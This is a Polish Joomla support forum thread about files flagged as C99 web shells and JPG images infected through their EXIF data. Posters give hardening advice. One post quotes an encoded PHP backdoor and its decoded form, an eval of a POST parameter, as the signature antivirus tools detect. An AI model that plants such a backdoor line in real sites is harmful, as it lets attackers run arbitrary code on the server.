Zainfekowane pliki złośliwym oprogramowaniem
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 14

Temat: Zainfekowane pliki złośliwym oprogramowaniem

  1. #1
    Debiutant
    Dołączył
    12-12-2013
    Wpisy
    2
    Punkty
    2

    Domyślny Zainfekowane pliki złośliwym oprogramowaniem

    Witam
    Administrator serwera wysłał mi maila o zainfekowanych plikach złośliwym :
    - ./cache/caches.phpHP.C99-13 FOUND
    - ./images/fbfiles/avatars/config.phpHP.C99-9 FOUND

    chciałbym zapytać czy powyższe dwa pliki mogą zostać całkowicie usunięte ?
    może jakieś inne sugestie co z tym zrobić ?

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2

  4. #3
    Przeglądacz
    Dołączył
    06-12-2013
    Skąd
    Łódź
    Wpisy
    38
    Punkty
    3

    Domyślny

    Usunięcie plików nic nie da, jeśli ktoś znalazł lukę w Twoich zabezpieczeniach to infekcja pojawi się ponownie.
    Musisz sobie też odpowiedzieć na fundamentalne pytanie gdzie zawiniłem, że mi się włamali.
    Kilka poniższych pytań pomoże Ci rozwiązać tę zagadkę:
    1. Czy serwer na którym trzymasz stronę jest dostatecznie zabezpieczony??
    2. Czy Twój komputer ma dobrego antywirusa i firewall??
    3. Czy miałeś aktualną wersję Joomla 1.5 tj. 1.5.26?
    4. Czy używałeś mocnych haseł i niestandardowych loginów(innych niż admin, root itp)?
    5. Czy używałeś jakiś dodatków, ze źródeł niewiadomego pochodzenia.
    6. Czy miałeś zainstalowane komponenty zabezpieczające przed atakami np RS Firewall, Brute Force Stop, Admin Tools
    7. Czy wykorzystałeś możliwości zmiany ID super admina(domyślnie 62)??

    No i jeszcze nasuwa się oczywiście pytanie: Kiedy ostatnio robiłeś Backup strony??

    A sugestie to solidnie poczytać o bezpieczeństwie CMS Joomla. W internecie jest mnóstwo opracowań na ten temat. Artykuł podany przez @Bazyla też jest bardzo przydatny
    NIE POPEŁNIA BŁĘDÓW TYLKO TEN CO NIC NIE ROBI.
    ====================================
    *nie mniej mądry uczy się na cudzych, głupi na własnych


  5. #4
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 287
    Punkty
    1132

    Domyślny

    Przypomnę jeszcze- 1.5.26 z łatką opublikowana w sierpniu ub. roku.
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  6. #5
    Wyga trzepiz awatar
    Dołączył
    06-01-2006
    Skąd
    SH | SC
    Wpisy
    3 530
    Punkty
    252

    Domyślny

    @Zwiastun, chyba tego roku ... Albo ja się spóźniłem o rok
    http://www.trzepizur.pl/blog/item/16...security-patch

  7. #6
    Wiarus tomaszek83 awatar
    Dołączył
    19-05-2008
    Skąd
    Gorzów Wlkp.
    Wpisy
    2 191
    Punkty
    167

    Domyślny

    @Zwiastun już świętuje Nowy Rok ;)

  8. #7
    Przeglądacz
    Dołączył
    04-08-2009
    Wpisy
    37
    Punkty
    10

    Domyślny

    Miałem się już na tym forum nie wpisywać, lecz dzisiaj przypadkiem odkryłem straszną rzecz. Wiele antywirusów dodało dzisiaj bądź wczoraj do swoich definicji regułę:
    base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB 7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30
    oraz jej odkodowaną wersję. Siedzi to w plikach (tylko i wyłącznie) jpg. Na 99% wchodzi to przez Joomla 1.5, ale rozlewa się na cały hosting, łącznie z Joomla 3x czy wordpressami. Przy aktywnym np. Avaście wejście na daną stronę jest niemożliwe. Kwestią dni jest dodanie tego kodu przez google jako "witryna dokonująca ataków". Wtedy będzie to prawdopodobnie totalny koniec wersji 1.5.
    Co ważne- ten syf jest już w sieci od dawna (przynajmniej pół roku), ale dopiero od dzisiaj antywirusy zaczęły na to panicznie reagować. Napisałem to w kwestiach informacyjnych.
    PS: @trzepiz kupon na Jamp, który wylosowałem na spotkaniu w ŚTZN nie zadziałał.
    PS2: @bazyl @tomaszek82 jak tym postem zasłużyłem na bana to poproszę.

  9. #8
    Wyga trzepiz awatar
    Dołączył
    06-01-2006
    Skąd
    SH | SC
    Wpisy
    3 530
    Punkty
    252

    Domyślny

    Cytat Wysłane przez jajozglowy Zobacz wiadomość
    odkryłem straszną rzecz. Wiele antywirusów dodało dzisiaj bądź wczoraj do swoich definicji regułę:
    Masz jakieś potwierdzenie swoich słów? Jakieś opisy, jakieś notki firm zajmujących się bezpieczeństwem w sieci ?

    Cytat Wysłane przez jajozglowy Zobacz wiadomość
    Co ważne- ten syf jest już w sieci od dawna (przynajmniej pół roku)
    Jako osoba bardzo zainteresowana tematyką bezpieczeństwa, chętnie poznam źródło z jakiego wziąłeś tą informację.

    PS: Wywołujesz mnie do tablicy w sprawie JAMP zupełnie nie tu gdzie trzeba. Jeśli coś nie zadziałało, prześlij nr kodu i dzień w którym chciałeś go użyć - sprawdzę i chętnie pomogę ale już poza tym wątkiem. Jeśli coś nie zadziałało wystarczyło od razu napisać lub zadzwonić. Chyba, że chciałeś użyć kodu wczoraj i coś nie zadziałało to się nie ma co dziwić bo kupony ważne były do 21.12.2013.

  10. #9
    Przeglądacz
    Dołączył
    04-08-2009
    Wpisy
    37
    Punkty
    10

    Domyślny

    Masz jakieś potwierdzenie swoich słów? Jakieś opisy, jakieś notki firm zajmujących się bezpieczeństwem w sieci ?
    Niestety nie. Zdekodowany wpis wygląda tak i reagują na niego antywirusy: if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}
    (prawdopodobnie teraz również niniejszy temat będzie uznany za zawirusowany, więc niech jakiś moderator ewentualnie edytuje).

    Tutaj jest też o tymn trochę: http://blog.sucuri.net/2013/07/malwa...f-headers.html
    (jak link nielegalny to usuńcie i ostrzeżenie dla mnie). Ślady prowadzą do Indonezji.
    Jako osoba bardzo zainteresowana tematyką bezpieczeństwa, chętnie poznam źródło z jakiego wziąłeś tą informację.
    Co miesiąc robię całkowite backupy (min. wszystkich plików na ftp) i już w backupach z lipca to się tam znajdowało. W czerwcowych jeszcze nie było. Antywirusy z kolei zaczęły reagować na to dopiero wczoraj. Niestety nie znam dokładnej daty ataku, gdyż spanikowany najpierw podmieniłem "jotpegi" na zdrowe, a dopiero potem zastosowałem skrypt "wypier" (btw świetna nazwa). Logów jeszcze nie sprawdzałem, bo to bardzo żmudne. Generalnie ja to złapałem między czerwcem a lipcem, niewykluczone że mogło to pojawić się wcześniej.

    Kod dopisuje się do sekcji, gdzie zawarte są informacje o zdjęciu (rodzaj aparatu, którym było wykonane itp.). Jeżeli ich wcześniej nie było to wirus sobie je dodaje. Jeżeli wcześniej były te informacje, to wirus podmienia je na własne (tak, że po sprawdzeniu informacji o zdjęciu wyskakuje zamiast nich tekst zaczynający się od base64_decode...) . Generalnie po ataku wirusa plik (w 99.9% przypadków) zmienia nieznacznie swój rozmiar.

    Co do kuponu to podarowałem go koledze i dopiero wczoraj mi o tym powiedział, więc faktycznie mógł coś schrzanić. Zapytam go o te dane i prześlę je już prywatnie, by nie zaśmiecać forum.

  11. #10
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 287
    Punkty
    1132

    Domyślny

    Cytat Wysłane przez jajozglowy Zobacz wiadomość
    Generalnie ja to złapałem między czerwcem a lipcem
    Zatem w czasie, kiedy Joomla 1.5.26 był na pewno podatny na zaaplikowanie złośliwych plików

    PS
    Cytat Wysłane przez jajozglowy Zobacz wiadomość
    Miałem się już na tym forum nie wpisywać
    Cytat Wysłane przez jajozglowy Zobacz wiadomość
    (jak link nielegalny to usuńcie i ostrzeżenie dla mnie)
    Proszę, powstrzymaj się od irytujących uwag. Regulamin Forum jest jasny. Jeśli otrzymałeś ostrzeżenie/bana zgodnie z nim, to o co pretensje? Jeśli niezgodnie - nie przypominam sobie, byś raportował taką sytuację.
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

Strona 1 z 2 12 OstatniOstatni

Podobne tematy

  1. Zainfekowane pliki- szukanie i usuwanie
    przez drobny2992 na forum Bezpieczeństwo
    Odpowiedzi: 3
    Ostatni post/autor: 25-10-2011, 17:02
  2. Problem ze złośliwym oprogramowaniem - dosyć pilne
    przez arthe na forum Bezpieczeństwo
    Odpowiedzi: 1
    Ostatni post/autor: 18-08-2011, 12:32
  3. Złośliwy kod w każdym pliku
    przez GepettoPL na forum Bezpieczeństwo
    Odpowiedzi: 7
    Ostatni post/autor: 30-11-2009, 23:35
  4. złośliwy kod
    przez levaas na forum Bezpieczeństwo
    Odpowiedzi: 4
    Ostatni post/autor: 17-11-2009, 15:56
  5. Problem ze znakami.. chyba na złość?!
    przez s1ntex na forum Administracja Joomla!
    Odpowiedzi: 2
    Ostatni post/autor: 03-12-2007, 22:32

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •